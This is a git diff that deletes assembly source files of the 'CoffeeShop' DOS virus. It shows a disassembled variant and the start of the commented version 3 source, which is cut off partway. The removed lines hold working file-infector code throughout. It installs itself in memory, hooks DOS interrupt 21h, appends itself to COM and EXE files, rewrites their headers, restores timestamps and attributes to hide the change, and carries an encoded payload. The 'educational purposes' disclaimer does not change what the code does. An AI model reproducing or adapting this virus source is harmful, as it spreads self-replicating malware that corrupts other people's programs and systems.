- db 003h, 08Fh, 0B8h, 007h, 00Eh, 0D6h, 0FBh, 00Ch
- db 0CDh, 021h, 058h, 0F8h, 063h, 0A7h, 0CBh, 020h
- db 002h, 0FEh, 020h, 000h, 0FAh, 0EBh, 0B0h, 0FCh
- db 0F8h, 003h, 077h, 0F0h, 0E0h, 0D0h, 041h, 00Fh
- db 0C0h, 02Fh, 007h, 01Dh, 080h, 06Fh, 0BAh, 0DCh
- db 0E1h, 034h, 0DBh, 00Ch, 0F8h, 0F0h, 00Eh, 0DFh
- db 0FEh, 0F4h, 0F8h, 0BBh, 0AEh, 0F8h, 0E4h, 003h
- db 084h, 0E0h, 0FCh, 0EBh, 0B0h, 0E6h, 0EAh, 0A3h
- db 083h, 0DAh, 0AAh, 00Eh, 0DCh, 009h, 0BAh, 0C8h
- db 001h, 03Ah, 0F0h, 050h, 007h, 0A2h, 0E8h, 0E0h
- db 0ACh, 005h, 0DBh, 00Eh, 077h, 00Fh, 0F8h, 0DCh
- db
0F6h, 0BAh, 0AEh, 0F0h, 0F6h, 0EBh, 03Ah, 0F0h
- db 0F4h, 0E0h, 040h, 017h, 0FAh, 0ECh, 01Dh, 072h
- db 0DFh, 0DAh, 0D2h, 074h, 0F8h, 0BAh, 0DDh, 020h
- db 01Dh, 074h, 0DEh, 020h, 0AAh, 007h, 0BAh, 0D8h
- db 061h, 0F8h, 047h, 087h, 0F8h, 0E8h, 0E1h, 0E8h
- db 0F8h, 092h, 0F4h, 000h, 01Dh, 060h, 0D8h, 0E8h
- db 009h, 0DCh, 0FEh, 009h, 0F8h, 0B0h, 023h, 0F8h
- db 05Ch, 0D7h, 0FCh, 0F8h, 0FCh, 0E8h, 001h, 03Bh
- db 0F4h, 0ECh, 080h, 0D2h, 01Dh, 0BEh, 0BAh, 05Ch
- db 020h, 07Ch, 003h, 075h, 060h, 0CAh, 020h, 00Eh
- db 0B2h, 0D8h, 081h, 0F0h, 03Bh, 040h, 092h, 0D7h
- db 0B5h, 0CEh, 0F8h, 0DCh, 060h, 0A7h, 041h, 0DEh
- db 060h, 002h, 0B5h, 0BEh, 03Ch, 020h, 00Fh, 07Bh
- db 022h, 065h, 007h, 01Dh, 060h, 06Eh, 084h, 0CCh
- db 0DFh, 00Dh, 020h, 0C0h, 0B3h, 020h, 02Fh, 060h
- db 041h, 01Eh, 06Ah, 0DEh, 07Eh, 00Ah, 042h, 0E0h
- db 009h, 0E4h, 0C0h, 075h, 030h, 060h, 00Bh, 0DFh
- db 01Ch, 0F4h, 0E4h, 042h, 04Fh, 05Eh, 05Eh, 041h
- db 09Ah, 022h, 006h, 02Bh, 01Ch, 080h, 060h, 03Eh
- db 084h, 057h, 005h, 0CAh, 046h, 0A4h, 0D0h, 07Bh
- db 053h, 07Ah, 097h, 005h, 015h, 0C2h, 004h, 020h
- db 01Dh, 054h, 060h, 001h, 0C8h, 051h, 041h, 0E8h
- db 0DCh, 006h, 054h, 0BEh, 077h, 0D8h, 02Dh, 078h
- db 07Ah, 050h, 055h, 001h, 004h, 020h, 05Dh, 007h
- db 076h, 02Eh, 0AEh, 03Ah, 0C6h, 062h, 0E8h, 0A0h
- db 055h, 05Eh, 009h, 0A2h, 002h, 0C0h, 020h, 057h
- db 084h, 0C6h, 0D0h, 004h, 01Dh, 02Ah, 05Dh, 05Eh
- db 0D6h, 016h, 017h, 080h, 098h, 0A4h, 040h, 003h
- db 050h, 0EAh, 0ACh, 05Dh, 005h, 062h, 0C4h, 01Dh
- db 070h, 059h, 05Eh, 0C4h, 067h, 005h, 082h, 0DCh
- db 020h, 002h, 005h, 060h, 020h, 0E4h, 090h, 062h
- db 019h, 0D4h, 094h, 065h, 0ECh, 00Eh, 069h, 05Eh
- db 0CFh, 007h, 0A0h, 070h, 020h, 0B0h, 0A2h, 0B2h
- db 083h, 00Ah, 062h, 069h, 0CCh, 03Bh, 060h, 05Eh
- db 0D5h, 002h, 0BEh, 080h, 070h, 090h, 062h, 004h
- db 072h, 083h, 055h, 0FEh, 06Eh, 010h, 041h, 040h
- db 041h, 0AEh, 0FEh, 0CEh, 075h, 034h, 09Eh, 0FEh
- db 002h, 071h, 05Ch, 0BAh, 0AAh, 0E6h, 0CCh, 018h
- db 072h, 0C0h, 062h, 040h,
00Eh, 06Ch, 07Bh, 047h
- db 0F2h, 0BCh, 005h, 015h, 028h, 050h, 026h, 0E1h
- db 070h, 0FEh, 052h, 05Fh, 068h, 009h, 0FEh, 0BEh
- db 040h, 010h, 02Ah, 0F2h, 0AEh, 0E0h, 03Ah, 070h
- db 0FEh, 0FCh, 06Ah, 04Ah, 050h, 0DEh, 061h, 0ACh
- db 061h, 0C7h, 050h, 00Eh, 001h, 03Eh, 072h, 060h
- db 048h, 08Eh, 00Ah, 06Ah, 096h, 03Ah, 0E8h, 002h
- db 066h, 058h, 084h, 0B0h, 045h, 0B4h, 007h, 020h
- db 05Ah, 0EAh, 0E9h, 0C0h, 044h, 02Dh, 060h, 0E8h
- db 093h, 0A0h, 09Eh, 073h, 048h, 050h, 0C6h, 0FFh
- db 0F0h, 041h, 0D3h, 0FFh, 060h, 040h, 001h, 0FFh
- db 0D1h, 0EDh, 0FEh, 0CAh, 075h, 005h, 0ADh, 08Bh
- db 0E8h, 0B2h, 010h, 0C3h, 0E8h, 0F1h, 0FFh, 0D0h
- db 0D7h, 0E8h, 0ECh, 0FFh, 072h, 014h, 0B6h, 002h
- db 0B1h, 003h, 0E8h, 0E3h, 0FFh, 072h, 009h, 0E8h
- db 0DEh, 0FFh, 0D0h, 0D7h, 0D0h, 0E6h, 0E2h, 0F2h
- db 02Ah, 0FEh, 0B6h, 002h, 0B1h, 004h, 0FEh, 0C6h
- db 0E8h, 0CDh, 0FFh, 072h, 010h, 0E2h, 0F7h, 0E8h
- db 0C6h, 0FFh, 073h, 00Dh, 0FEh, 0C6h, 0E8h, 0BFh
- db 0FFh, 073h, 002h, 0FEh, 0C6h, 08Ah, 0CEh, 0EBh
- db 02Ah, 0E8h, 0B4h, 0FFh, 072h, 010h, 0B1h, 003h
- db 0B6h, 000h, 0E8h, 0ABh, 0FFh, 0D0h, 0D6h, 0E2h
- db 0F9h, 080h, 0C6h, 009h, 0EBh, 0E7h, 0ACh, 08Ah
- db 0C8h, 083h, 0C1h, 011h, 0EBh, 00Dh, 0B1h, 003h
- db 0E8h, 095h, 0FFh, 0D0h, 0D7h, 0E2h, 0F9h, 0FEh
- db 0CFh, 0B1h, 002h, 026h, 08Ah, 001h, 0AAh, 0E2h
- db 0FAh, 0E8h, 084h, 0FFh, 073h, 003h, 0A4h, 0EBh
- db 0F8h, 0E8h, 07Ch, 0FFh, 0ACh, 0B7h, 0FFh, 08Ah
- db 0D8h, 072h, 081h, 0E8h, 072h, 0FFh, 072h, 0D6h
- db 03Ah, 0FBh, 075h, 0DDh, 033h, 0EDh, 033h, 0FFh
- db 033h, 0F6h, 033h, 0D2h, 033h, 0DBh, 033h, 0C0h
- db 0E9h, 07Dh, 0EBh
-
-last:
-
-_TEXT ends
- end first
-
-
diff --git a/c/COFFSHP1 (44).ASM b/c/COFFSHP1 (44).ASM
deleted file mode 100755
index b0984d5..0000000
--- a/c/COFFSHP1 (44).ASM
+++ /dev/null
@@ -1,825 +0,0 @@ - -PAGE 59,132 - -; -; -; COFFSHP1 -; -; Created: 23-Jun-92 -; Passes: 5 Analysis Options on: AW -; -; - -data_1e equ 0F8h -data_2e equ 0FAh -data_3e equ 43Bh -data_4e equ 0F4h -data_5e equ 0F8h -data_6e equ 0FCh -data_15e equ 15A1h - -seg_a segment byte public - assume cs:seg_a, ds:seg_a - - - org 100h - -coffshp1 proc far - -start: - jmp loc_2 - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+di],ah - inc ax - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - int 20h ; DOS program terminate - db 27 dup (0) -loc_2: - call sub_2 - -coffshp1 endp - -; -; SUBROUTINE -; - -sub_2 proc near - pop si - mov di,100h - sub si,20h - push ax - push ds - push es - push di - push si - cld ; Clear direction - mov ah,30h ; '0' - int 21h ; DOS Services ah=function 30h - ; get DOS version number ax - xchg ah,al - cmp ax,30Ah - jb loc_3 ; Jump if below - mov ax,33DAh - int 21h ; ??INT Non-standard interrupt - cmp ah,0A5h - je loc_3 ; Jump if equal - mov ax,es - dec ax - mov ds,ax - xor bx,bx ; Zero register - cmp byte ptr [bx],5Ah ; 'Z' - jne loc_3 ; Jump if not equal - mov ax,[bx+3] - sub ax,72h - jc loc_3 ; Jump if carry Set - mov [bx+3],ax - sub word ptr [bx+12h],72h - mov es,[bx+12h] - push cs - pop ds - mov cx,620h - rep movsb ; Rep when cx >0 Mov [si] to es:[di] - push es - pop ds - mov ax,3521h - int 21h ; DOS Services ah=function 35h - ; get intrpt vector al in es:bx - mov ds:data_1e,bx - mov ds:data_2e,es -;* mov dx,offset loc_1 - db 0BAh, 01h, 02h - mov ax,2521h - int 21h ; DOS Services ah=function 25h - ; set intrpt vector al to ds:dx - mov ah,2Ah ; '*' - int 21h ; DOS Services ah=function 2Ah - ; get date, cx=year, dh=month - ; dl=day, al=day-of-week 0=SUN - cmp al,5 - jne loc_3 ; Jump if not equal - mov ah,2Ch ; ',' - int 21h ; DOS Services ah=function 2Ch - ; get time, cx=hrs/min, dx=sec - or dh,dh ; Zero ? 
- jnz loc_3 ; Jump if not zero - pop ax - push ax - call sub_3 -loc_3: - pop si - pop di - pop es - pop ds - pop ax - cmp byte ptr cs:[si+1Ch],0 - je loc_4 ; Jump if equal - mov bx,ds - add bx,10h - mov cx,bx - add bx,cs:[si+0Eh] - cli ; Disable interrupts - mov ss,bx - mov sp,cs:[si+10h] - sti ; Enable interrupts - add cx,cs:[si+16h] - push cx - push word ptr cs:[si+14h] - retf ; Return far -loc_4: - push di - mov cx,1Ch - rep movsb ; Rep when cx >0 Mov [si] to es:[di] - retn -sub_2 endp - - -; -; SUBROUTINE -; - -sub_3 proc near - mov bx,ax - add bx,152h - push cs - push bx - add ax,62Fh - and ax,0FFF0h - mov di,ax - mov si,data_3e - mov cx,2E5h - push cs - pop es - rep movsb ; Rep when cx >0 Mov [si] to es:[di] - mov cl,4 - shr ax,cl ; Shift w/zeros fill - mov dx,cs - add ax,dx - sub ax,10h - mov ds,ax - mov es,ax - push ax - mov ax,100h - push ax - retf ; Return far -sub_3 endp - - and [bp+di+6Fh],al - db 'ffeeShop ' - db 0B0h, 03h,0CFh, 9Ch, 3Dh,0DAh - db 33h, 75h, 05h,0B8h, 01h,0A5h - db 9Dh,0CFh - db 06h, 1Eh, 56h, 57h, 52h, 51h - db 53h, 50h, 3Dh, 00h, 4Bh, 74h - db 0Ch, 3Dh, 00h - db 6Ch, 75h, 0Ah - db 0F6h,0C3h, 03h, 75h, 05h, 8Bh - db 0D7h -loc_7: - call sub_4 -loc_8: - pop ax - pop bx - pop cx - pop dx - pop di - pop si - pop ds - pop es - popf ; Pop flags - jmp dword ptr cs:data_5e - -; -; SUBROUTINE -; - -sub_4 proc near - cld ; Clear direction - push cs - pop es - mov si,dx - xor di,di ; Zero register - mov cx,80h - -locloop_9: - lodsb ; String [si] to al - cmp al,0 - je loc_12 ; Jump if equal - cmp al,61h ; 'a' - jb loc_10 ; Jump if below - cmp al,7Ah ; 'z' - ja loc_10 ; Jump if above - xor al,20h ; ' ' -loc_10: - stosb ; Store al to es:[di] - loop locloop_9 ; Loop if cx > 0 - - -loc_ret_11: - retn -loc_12: - stosb ; Store al to es:[di] - lea si,[di-5] ; Load effective addr - push cs - pop ds - lodsw ; String [si] to ax - cmp ax,452Eh - jne loc_13 ; Jump if not equal - lodsw ; String [si] to ax - cmp ax,4558h - jmp short loc_14 -loc_13: - cmp 
ax,432Eh - jne loc_ret_11 ; Jump if not equal - lodsw ; String [si] to ax - cmp ax,4D4Fh -loc_14: - jne loc_ret_11 ; Jump if not equal - std ; Set direction flag - mov cx,si - inc cx - -locloop_15: - lodsb ; String [si] to al - cmp al,3Ah ; ':' - je loc_16 ; Jump if equal - cmp al,5Ch ; '\' - je loc_16 ; Jump if equal - loop locloop_15 ; Loop if cx > 0 - - dec si -loc_16: - cld ; Clear direction - lodsw ; String [si] to ax - lodsw ; String [si] to ax - mov di,3BEh - mov cl,0Ch - repne scasw ; Rep zf=0+cx >0 Scan es:[di] for ax - jz loc_ret_11 ; Jump if zero - mov ax,3300h - int 21h ; DOS Services ah=function 33h - ; get ctrl-break flag in dl - push dx - cwd ; Word to double word - inc ax - push ax - int 21h ; DOS Services ah=function 33h - ; set ctrl-break flag dl=off/on - mov ax,3524h - int 21h ; DOS Services ah=function 35h - ; get intrpt vector al in es:bx - push es - push bx - push cs - pop ds - mov dx,offset int_24h_entry - mov ah,25h ; '%' - push ax - int 21h ; DOS Services ah=function 25h - ; set intrpt vector al to ds:dx - mov ax,4300h - cwd ; Word to double word - int 21h ; DOS Services ah=function 43h - ; get attrb cx, filename @ds:dx - push cx - xor cx,cx ; Zero register - mov ax,4301h - push ax - int 21h ; DOS Services ah=function 43h - ; set attrb cx, filename @ds:dx - jc loc_17 ; Jump if carry Set - mov ax,3D02h - int 21h ; DOS Services ah=function 3Dh - ; open file, al=mode,name@ds:dx - jnc loc_18 ; Jump if carry=0 -loc_17: - jmp loc_24 -loc_18: - xchg ax,bx - mov ax,5700h - int 21h ; DOS Services ah=function 57h - ; get file date+time, bx=handle - ; returns cx=time, dx=time - push dx - push cx - mov cx,1Ch - mov si,100h - mov dx,si - call sub_7 - jc loc_19 ; Jump if carry Set - mov ax,4202h - xor cx,cx ; Zero register - cwd ; Word to double word - int 21h ; DOS Services ah=function 42h - ; move file ptr, bx=file handle - ; al=method, cx,dx=offset - mov di,data_4e - mov [di],ax - mov [di+2],dx - cmp word ptr [si+12h],4021h - je loc_19 ; Jump if equal 
- cmp word ptr [si],5A4Dh - je loc_20 ; Jump if equal - mov byte ptr [si+1Ch],0 - test byte ptr [si],80h - jz loc_19 ; Jump if zero - cmp word ptr [di],0D000h - jae loc_19 ; Jump if above or = - cmp word ptr [di],7D0h - jb loc_19 ; Jump if below - call sub_10 - jnz loc_19 ; Jump if not zero - mov byte ptr [si],0E9h - mov ax,[di] - add ax,1Ah - mov [si+1],ax - jmp short loc_22 -loc_19: - jmp loc_23 -loc_20: - mov byte ptr [si+1Ch],1 - cmp word ptr [si+18h],40h - jb loc_21 ; Jump if below - mov ax,3Ch - cwd ; Word to double word - call sub_6 - jc loc_23 ; Jump if carry Set - mov ax,[si-4] - mov dx,[si-2] - call sub_6 - jc loc_23 ; Jump if carry Set - cmp byte ptr [si-3],45h ; 'E' - je loc_23 ; Jump if equal -loc_21: - call sub_9 - cmp [si+4],ax - jne loc_23 ; Jump if not equal - cmp [si+2],dx - jne loc_23 ; Jump if not equal - cmp word ptr [si+0Ch],0 - je loc_23 ; Jump if equal - cmp word ptr [si+1Ah],0 - jne loc_23 ; Jump if not equal - call sub_10 - jnz loc_23 ; Jump if not zero - call sub_8 - mov [si+4],ax - mov [si+2],dx - call sub_11 - mov cx,10h - div cx ; ax,dx rem=dx:ax/reg - sub ax,[si+8] - dec ax - add dx,2Dh - mov [si+16h],ax - mov [si+0Eh],ax - mov [si+14h],dx - mov word ptr [si+10h],17E0h - lea di,[si+0Ah] ; Load effective addr - call sub_5 - lea di,[si+0Ch] ; Load effective addr - call sub_5 -loc_22: - call sub_12 - mov word ptr [si+12h],4021h - mov cx,1Ch - mov dx,si - mov ah,40h ; '@' - int 21h ; DOS Services ah=function 40h - ; write file bx=file handle - ; cx=bytes from ds:dx buffer -loc_23: - pop cx - pop dx - mov ax,5701h - int 21h ; DOS Services ah=function 57h - ; set file date+time, bx=handle - ; cx=time, dx=time - mov ah,3Eh ; '>' - int 21h ; DOS Services ah=function 3Eh - ; close file, bx=file handle -loc_24: - pop ax - pop cx - cwd ; Word to double word - int 21h ; DOS Services ah=function 43h - ; set attrb cx, filename @ds:dx - pop ax - pop dx - pop ds - int 21h ; DOS Services ah=function 25h - ; set intrpt vector al to ds:dx - pop ax - pop 
dx - int 21h ; DOS Services ah=function 33h - ; set ctrl-break flag dl=off/on - retn -sub_4 endp - - inc bx - dec di - push bx - inc bx - inc bx - dec sp - push si - push bx - dec si - inc bp - dec ax - push sp - push sp - inc dx - push si - dec cx - push dx - inc cx - inc si - inc bp - dec bp - push sp - inc dx - push dx - -; -; SUBROUTINE -; - -sub_5 proc near - mov ax,[di] - sub ax,62h - jc loc_25 ; Jump if carry Set - cmp ax,14Bh - jae loc_26 ; Jump if above or = -loc_25: - mov ax,14Bh -loc_26: - mov [di],ax - retn -sub_5 endp - - -; -; SUBROUTINE -; - -sub_6 proc near - call sub_13 - mov dx,data_6e - mov cx,4 - -; External Entry into Subroutine - -sub_7: - mov ah,3Fh ; '?' - int 21h ; DOS Services ah=function 3Fh - ; read file, bx=file handle - ; cx=bytes to ds:dx buffer - retn -sub_6 endp - - -; -; SUBROUTINE -; - -sub_8 proc near - call sub_11 - add ax,620h - adc dx,0 - jmp short loc_27 - -; External Entry into Subroutine - -sub_9: - call sub_11 -loc_27: - mov cx,200h - div cx ; ax,dx rem=dx:ax/reg - or dx,dx ; Zero ? 
- jz loc_ret_28 ; Jump if zero - inc ax - -loc_ret_28: - retn -sub_8 endp - - -; -; SUBROUTINE -; - -sub_10 proc near - call sub_11 - call sub_13 - mov cx,620h - mov dx,si - mov ah,40h ; '@' - int 21h ; DOS Services ah=function 40h - ; write file bx=file handle - ; cx=bytes from ds:dx buffer - cmp ax,cx - retn -sub_10 endp - - -; -; SUBROUTINE -; - -sub_11 proc near - mov ax,[di] - mov dx,[di+2] - retn -sub_11 endp - - -; -; SUBROUTINE -; - -sub_12 proc near - xor ax,ax ; Zero register - cwd ; Word to double word - -; External Entry into Subroutine - -sub_13: - xchg cx,dx - xchg ax,dx - mov ax,4200h - int 21h ; DOS Services ah=function 42h - ; move file ptr, bx=file handle - ; al=method, cx,dx=offset - retn -sub_12 endp - - and [di+4Bh],cl - and [bx],ah - cmp [bp+si],si - and ds:data_15e[bx],bh - cmp di,sp - jb loc_29 ; Jump if below - mov ah,4Ch ; 'L' - int 21h ; DOS Services ah=function 4Ch - ; terminate with al=return code -loc_29: - mov si,403h - mov cx,170h - std ; Set direction flag - rep movsw ; Rep when cx >0 Mov [si] to es:[di] - cld ; Clear direction - mov si,di - mov di,100h - lodsw ; String [si] to ax - lodsw ; String [si] to ax - mov bp,ax - mov dl,10h - jmp $+1439h - adc ax,7FDFh - cld ; Clear direction - mov ah,0Fh - int 10h ; Video display ah=functn 0Fh - ; get state, al=mode, bh=page - ; ah=columns on screen - mov ah,0 - push ax - sti ; Enable interrupts - mov bh,0B0h - cmp al,7 -;* je loc_31 ; Jump if equal - db 74h,0FFh - dec word ptr [bp+si] - cmp al,4 - jae $+2Ah ; Jump if above or = - mov bh,0B8h - cmp al,2 - jb $+24h ; Jump if below - mov es,bx - mov si,140h - db 0FFh,0FFh,0B0h, 19h, 57h,0B1h - db 50h,0F3h,0A5h, 5Fh, 81h,0C7h - db 0A0h, 00h,0FEh,0C8h, 75h,0F2h - db 03h, 8Fh,0B8h, 07h, 0Eh,0D6h - db 0FBh, 0Ch,0CDh, 21h, 58h,0F8h - db 63h,0A7h,0CBh, 20h, 02h,0FEh - db 20h, 00h,0FAh,0EBh,0B0h,0FCh - db 0F8h, 03h, 77h,0F0h,0E0h,0D0h - db 41h, 0Fh,0C0h, 2Fh, 07h, 1Dh - db 80h, 6Fh,0BAh,0DCh,0E1h, 34h - db 0DBh, 0Ch,0F8h,0F0h, 0Eh,0DFh - db 
0FEh,0F4h,0F8h,0BBh,0AEh,0F8h - db 0E4h, 03h, 84h,0E0h,0FCh,0EBh - db 0B0h,0E6h,0EAh,0A3h, 83h,0DAh - db 0AAh, 0Eh,0DCh, 09h,0BAh,0C8h - db 01h, 3Ah,0F0h, 50h, 07h,0A2h - db 0E8h,0E0h,0ACh, 05h,0DBh, 0Eh - db 77h, 0Fh,0F8h,0DCh,0F6h,0BAh - db 0AEh,0F0h,0F6h,0EBh, 3Ah,0F0h - db 0F4h,0E0h, 40h, 17h,0FAh -loc_33: - in al,dx ; port 10h ??I/O Non-standard - sbb ax,0DF72h - esc 2,dl ; coprocessor escape - jz loc_33 ; Jump if zero - mov dx,20DDh - sbb ax,0DE74h - and [bp+si-45F9h],ch - esc 0,[bx+di-8] ; coprocessor escape - inc di - xchg di,ax - call $-171Ch - clc ; Clear carry flag - xchg ax,dx - hlt ; Halt processor - add [di],bl - db 60h,0D8h,0E8h, 09h,0DCh,0FEh - db 09h,0F8h,0B0h, 23h,0F8h, 5Ch - db 0D7h,0FCh,0F8h,0FCh,0E8h, 01h - db 3Bh,0F4h,0ECh, 80h,0D2h, 1Dh - db 0BEh,0BAh, 5Ch, 20h, 7Ch, 03h - db 75h, 60h,0CAh, 20h, 0Eh,0B2h - db 0D8h, 81h,0F0h, 3Bh, 40h, 92h - db 0D7h,0B5h,0CEh,0F8h,0DCh, 60h - db 0A7h, 41h,0DEh, 60h, 02h,0B5h - db 0BEh, 3Ch, 20h, 0Fh, 7Bh, 22h - db 65h, 07h, 15h, 60h, 6Eh, 42h - db 68h,0B8h, 20h,0FEh,0FCh,0AEh - db 23h,0FCh,0E2h, 7Fh, 07h,0C0h - db 0B3h, 20h, 2Fh, 60h, 79h, 28h - db 6Ah,0DEh, 7Eh,0E0h, 08h,0D5h - db 09h,0E4h,0C0h, 60h,0C1h, 70h - db 0Bh,0DFh,0E4h, 42h,0D0h, 7Bh - db 4Fh, 5Eh, 9Ah, 05h,0ADh - db 22h - db 06h, 80h, 70h, 10h, 60h, 3Eh - db 05h,0CAh, 5Eh, 41h, 46h,0A4h - db 53h,0EFh, 15h - db 7Ah - db 97h,0C2h, 54h, 74h, 04h, 20h - db 60h, 50h, 45h, 01h,0C8h,0E8h - db 0DCh, 05h,0F9h, 06h, 54h,0D8h - db 0DEh, 41h, 2Dh, 78h, 7Ah, 01h - db 55h, 75h, 04h, 20h, 76h, 1Dh - db 0B8h, 2Eh,0EAh,0A0h,0C6h, 62h - db 55h, 83h, 8Ah, 5Eh, 09h,0C0h - db 0Ah, 5Ch, 20h,0C6h, 11h, 12h - db 0D0h, 2Ah, 74h, 58h, 5Dh, 5Eh - db 17h, 5Bh, 60h, 80h, 92h, 0Eh - db 40h,0EAh, 40h, 75h,0ACh, 62h - db 15h, 74h,0C4h, 59h, 5Eh,0C0h - db 9Dh,0C4h, 82h, 15h, 08h,0DCh - db 20h, 14h, 90h, 60h, 20h, 43h - db 66h, 62h, 94h, 50h, 3Bh, 65h - db 0ECh, 5Eh,0A4h, 1Dh,0CFh, 70h - db 80h,0C2h, 20h, 8Ah, 0Eh,0B2h - db 62h, 2Ah,0ECh, 69h,0CCh, 5Eh - db 80h, 55h,0BEh, 0Bh,0C0h, 
80h - db 62h, 41h, 0Eh, 04h, 72h,0FEh - db 56h, 05h, 6Eh, 10h, 01h,0D5h - db 41h,0AEh,0FEh,0CEh, 9Eh,0D1h - db 08h,0FEh,0C4h,0E9h, 5Ch,0E6h - db 0AAh, 62h,0CCh,0C0h,0C8h, 01h - db 62h, 39h,0ECh, 6Ch,0F2h, 9Dh - db 62h,0BCh, 94h, 48h, 41h, 28h - db 4Ah, 45h, 38h, 26h,0FEh, 52h - db 1Ch, 5Ah, 5Fh,0FEh,0BEh, 40h - db 02h, 84h,0F2h, 0Ah,0B8h,0AEh - db 70h,0FEh,0FCh, 8Eh, 12h, 6Ah - db 0DEh, 54h,0D8h, 61h,0ACh, 50h - db 0B1h, 43h, 3Eh, 72h, 80h,0A3h - db 60h, 48h, 6Ah, 82h, 0Eh, 96h - db 02h, 66h, 3Ah, 6Ch, 58h, 84h - db 0B4h,0D1h, 01h, 5Ah, 48h, 3Ah - db 0EAh, 44h, 70h, 0Bh,0E8h,0D8h - db 24h, 9Eh, 28h, 12h, 73h,0C6h - db 54h,0D0h,0FFh - db 0F0h,0FFh, 60h, 34h, 50h, 00h - db 00h,0FFh - -; -; SUBROUTINE -; - -sub_14 proc near - shr bp,1 ; Shift w/zeros fill - dec dl - jnz loc_ret_38 ; Jump if not zero - lodsw ; String [si] to ax - mov bp,ax - mov dl,10h - -loc_ret_38: - retn -sub_14 endp - -loc_39: - call sub_14 - rcl bh,1 ; Rotate thru carry - call sub_14 - jc loc_42 ; Jump if carry Set - mov dh,2 - mov cl,3 - -locloop_40: - call sub_14 - jc loc_41 ; Jump if carry Set - call sub_14 - rcl bh,1 ; Rotate thru carry - shl dh,1 ; Shift w/zeros fill - loop locloop_40 ; Loop if cx > 0 - -loc_41: - sub bh,dh -loc_42: - mov dh,2 - mov cl,4 - -locloop_43: - inc dh - call sub_14 - jc loc_44 ; Jump if carry Set - loop locloop_43 ; Loop if cx > 0 - - call sub_14 - jnc loc_45 ; Jump if carry=0 - inc dh - call sub_14 - jnc loc_44 ; Jump if carry=0 - inc dh -loc_44: - mov cl,dh - jmp short locloop_51 -loc_45: - call sub_14 - jc loc_47 ; Jump if carry Set - mov cl,3 - mov dh,0 - -locloop_46: - call sub_14 - rcl dh,1 ; Rotate thru carry - loop locloop_46 ; Loop if cx > 0 - - add dh,9 - jmp short loc_44 -loc_47: - lodsb ; String [si] to al - mov cl,al - add cx,11h - jmp short locloop_51 -loc_48: - mov cl,3 - -locloop_49: - call sub_14 - rcl bh,1 ; Rotate thru carry - loop locloop_49 ; Loop if cx > 0 - - dec bh -loc_50: - mov cl,2 - -locloop_51: - mov al,es:[bx+di] - stosb ; Store al to 
es:[di] - loop locloop_51 ; Loop if cx > 0 - -loc_52: - call sub_14 - jnc loc_53 ; Jump if carry=0 - movsb ; Mov [si] to es:[di] - jmp short loc_52 -loc_53: - call sub_14 - lodsb ; String [si] to al - mov bh,0FFh - mov bl,al - jc loc_39 ; Jump if carry Set - call sub_14 - jc loc_48 ; Jump if carry Set - cmp bh,bl - jne loc_50 ; Jump if not equal - xor bp,bp ; Zero register - xor di,di ; Zero register - xor si,si ; Zero register - xor dx,dx ; Zero register - xor bx,bx ; Zero register - xor ax,ax ; Zero register - jmp $-1480h - -seg_a ends - - - - end start diff --git a/c/COFFSHP3 (45).ASM b/c/COFFSHP3 (45).ASM deleted file mode 100755 index bf2786e..0000000 --- a/c/COFFSHP3 (45).ASM +++ /dev/null 
@@ -1,1674 +0,0 @@ -;****************************************************************************** -;* CoffeeShop VIRUS version 3 -;* -;* Use MASM 4.0 to compile this source -;* (other assemblers will probably not produce the same result) -;* -;* Disclaimer: -;* This file is only for educational purposes. The author takes no -;* responsibility for anything anyone does with this file. Do not -;* modify this file! -;****************************************************************************** - - - .RADIX 16 - - -_TEXT segment - - assume cs:_TEXT, ds:_TEXT - - -VERSION equ 3 -PICLEN equ last - beeld ;length of picture routine -FILELEN equ last - first ;length of virus -FILEPAR equ (FILELEN + 0F)/10 ;length of virus in paragraphs -VIRPAR equ 00D0 ;space for resident virus -WORKPAR equ 0160 ;work space for engine -STACKOFF equ 1000 ;Stack offset -DATAPAR equ 0050 ;extra memory allocated -BUFLEN equ 1C ;length of buffer - - -;**************************************************************************** -;* data area for virus -;**************************************************************************** - - org 00E0 - -mutstack dw 0, 0 -oldlen dw 0, 0 -oi21 dw 0, 0 -minibuf db 0, 0, 0, 0 - - -;**************************************************************************** -;* data area for engine -;**************************************************************************** - -add_val dw 0 -xor_val dw 0 -xor_offset dw 0 -where_len dw 0 -where_len2 dw 0 -flags db 0 - - -;****************************************************************************** -;* Begin of virus, installation in memory -;****************************************************************************** - - org 0100 - -first: call next ;get IP -next: pop si - - sub si,low 3 ;SI = begin virus - mov di,0100 - cld - - push ax ;save registers - push ds - push es - push di - push si - - mov ah,30 ;DOS version >= 3.1? - int 21 - xchg ah,al - cmp ax,030A - jb not_install - - mov ax,33DA ;already resident? 
- int 21 - cmp ah,0A5 - je not_install - - mov ax,es ;adjust memory-size - dec ax - mov ds,ax - xor bx,bx - cmp byte ptr [bx],5A - jne not_install - mov ax,[bx+3] - sub ax,(VIRPAR+WORKPAR) - jb not_install - mov [bx+3],ax - sub word ptr ds:[bx+12],(VIRPAR+WORKPAR) - - mov es,[bx+12] ;copy program to top - push cs - pop ds - mov cx,FILELEN - rep movsb - - push es - pop ds - - mov ax,3521 ;get original int21 vector - int 21 - mov ds:[oi21],bx - mov ds:[oi21+2],es - - mov dx,offset ni21 ;install new int21 handler - mov ax,2521 - int 21 - - mov ax,33DBh ;init. random nr. generator - int 21 - - mov ah,2A ;ask date - int 21 - cmp al,5 ;friday ? - jne not_install - mov ah,2C ;ask time - int 21 - or dh,dh ;sec = 0 ? - jnz not_install - - mov ax,33DC ;show picture - int 21 - -not_install: pop si ;restore registers - pop di - pop es - pop ds - pop ax - - add si,(offset buffer) - sub si,di - cmp byte ptr cs:[si],4Dh ;COM or EXE ? - je entryE - -entryC: push di - mov cx,BUFLEN - rep movsb - ret - -entryE: mov bx,ds ;calculate CS - add bx,low 10 - mov cx,bx - add bx,cs:[si+0E] - cli ;restore SS and SP - mov ss,bx - mov sp,cs:[si+10] - sti - add cx,cs:[si+16] - push cx ;push new CS on stack - push cs:[si+14] ;push new IP on stack - db 0CBh ;retf - - -;****************************************************************************** -;* Interupt 24 handler -;****************************************************************************** - -ni24: mov al,3 ;to avoid 'Abort, Retry, ...' - iret - - -;****************************************************************************** -;* Interupt 21 handler -;****************************************************************************** - -ni21: pushf - - cmp ax,33DA ;install-check ? - jne not_ic - mov ax,0A500+VERSION ;return a signature - popf - iret - -not_ic: push es ;save registers - push ds - push si - push di - push dx - push cx - push bx - push ax - - cmp ax,33DBh 